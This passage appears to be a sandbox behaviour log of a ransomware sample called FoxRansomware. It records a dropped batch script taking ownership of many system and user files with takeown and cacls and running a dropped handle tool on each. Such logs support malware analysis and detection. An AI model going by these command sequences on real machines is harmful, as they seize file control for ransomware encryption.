C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:6544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:6428
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""2⤵PID:6504
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C3⤵PID:6752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftWordpad.xml" -nobanner3⤵PID:6784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftWordpad.xml" -nobanner4⤵
- Executes dropped EXE
PID:7028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl""2⤵PID:6920
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl" /E /G Admin:F /C3⤵PID:6452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl" -nobanner3⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:6780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:6088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵PID:6412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "classes.jsa" -nobanner3⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:6424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl""2⤵PID:4532
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl" /E /G Admin:F /C3⤵PID:7144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl" -nobanner3⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:7416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C3⤵PID:2464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"3⤵PID:6028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "AssemblyList_4_extended.xml" -nobanner3⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "AssemblyList_4_extended.xml" -nobanner4⤵
- Executes dropped EXE
PID:2984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:5632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:3168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "watermark.png" -nobanner3⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:3596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:5340
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:6136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:4984
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:2352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:6152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:5172
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:7268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵PID:7224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:8116
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:3204
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:2260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:6340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:7448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:5756
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:3192
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:64
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:5256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:464
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:6580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C3⤵PID:5996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"3⤵PID:2392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000005.bin" -nobanner3⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000005.bin" -nobanner4⤵
- Executes dropped EXE
PID:6796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""2⤵PID:7608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C3⤵PID:1440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"3⤵PID:6868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000I.bin" -nobanner3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000I.bin" -nobanner4⤵
- Executes dropped EXE
PID:5916
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""2⤵PID:5132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C3⤵PID:6448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"3⤵PID:5064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000T.bin" -nobanner3⤵PID:6356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000T.bin" -nobanner4⤵
- Executes dropped EXE
PID:5396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""2⤵PID:3208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"3⤵PID:6480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000017.bin" -nobanner3⤵PID:2188
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000017.bin" -nobanner4⤵
- Executes dropped EXE
PID:2620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""2⤵PID:4840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C3⤵PID:5424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"3⤵PID:6272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006J.bin" -nobanner3⤵PID:6260
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000006J.bin" -nobanner4⤵PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl""2⤵PID:6316
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl" /E /G Admin:F /C3⤵PID:7228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl"3⤵PID:7184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl" -nobanner3⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "UpdateSessionOrchestration.96b8cff9-d70a-498e-b00b-f9bfbc22533b.1.etl" -nobanner4⤵PID:7200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""2⤵PID:7292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C3⤵PID:7284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"3⤵PID:7400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000G.bin" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000G.bin" -nobanner4⤵PID:7680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""2⤵PID:7884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C3⤵PID:268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"3⤵PID:7396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000R.bin" -nobanner3⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000R.bin" -nobanner4⤵PID:7356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""2⤵PID:3744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C3⤵PID:7020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"3⤵PID:7924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000015.bin" -nobanner3⤵PID:300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000015.bin" -nobanner4⤵PID:7500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""2⤵PID:7976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C3⤵PID:8000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"3⤵PID:8076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006H.bin" -nobanner3⤵PID:7956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000006H.bin" -nobanner4⤵PID:7936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""2⤵PID:6984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C3⤵PID:6960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"3⤵PID:8172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000075.bin" -nobanner3⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000075.bin" -nobanner4⤵PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""2⤵PID:4232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C3⤵PID:2120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"3⤵PID:6948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000083.bin" -nobanner3⤵PID:5864
-
